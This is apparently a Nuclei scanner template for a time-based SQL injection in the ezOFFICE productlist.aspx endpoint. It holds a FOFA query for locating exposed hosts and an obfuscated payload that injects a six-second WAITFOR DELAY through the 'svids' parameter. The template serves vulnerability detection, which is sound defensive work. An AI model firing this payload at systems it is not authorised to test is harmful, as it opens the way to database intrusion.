id: wanhu-ezOFFICE-sql-time-productlist

info:
  name: wanhu-ezOFFICE-sql-time-productlist
  author: p1z
  severity: high
  description: |
    万户 ezOFFICE productlist 接口SQL注入漏洞
  reference:
    - 暂未公开
  metadata:
    fofa-query: app="万户网络-ezOFFICE"
    hunter-query: 
    verified: true
  tags: 2023,wanhu,ezOFFICE,sql 

requests:
  - raw:
    - |
      POST /shop/productlist.aspx HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      Cookie: ASP.NET_SessionId=51231sadnaksdwadaw
      Content-Type: application/x-www-form-urlencoded

      svids=361%29%3BDECLARE+%40%40proc_name+VARCHAR%28301%29%3BSet+%40%40proc_name%3DChar%28115%29%252bChar%28101%29%252bChar%28108%29%252bChar%28101%29%252bChar%2899%29%252bChar%28116%29%252bChar%2832%29%252bChar%2849%29%252bChar%2832%29%252bChar%28119%29%252bChar%28104%29%252bChar%28101%29%252bChar%28114%29%252bChar%28101%29%252bChar%2832%29%252bChar%2849%29%252bChar%2861%29%252bChar%2849%29%252bChar%2832%29%252bChar%2887%29%252bChar%2865%29%252bChar%2873%29%252bChar%2884%29%252bChar%2870%29%252bChar%2879%29%252bChar%2882%29%252bChar%2832%29%252bChar%2868%29%252bChar%2869%29%252bChar%2876%29%252bChar%2865%29%252bChar%2889%29%252bChar%2832%29%252bChar%2839%29%252bChar%2848%29%252bChar%2858%29%252bChar%2848%29%252bChar%2858%29%252bChar%2854%29%252bChar%2839%29%3BEXECUTE+%28%40%40proc_name%29%3B--a%2B

    matchers:
      - type: dsl
        dsl: 
          - 'duration>=6'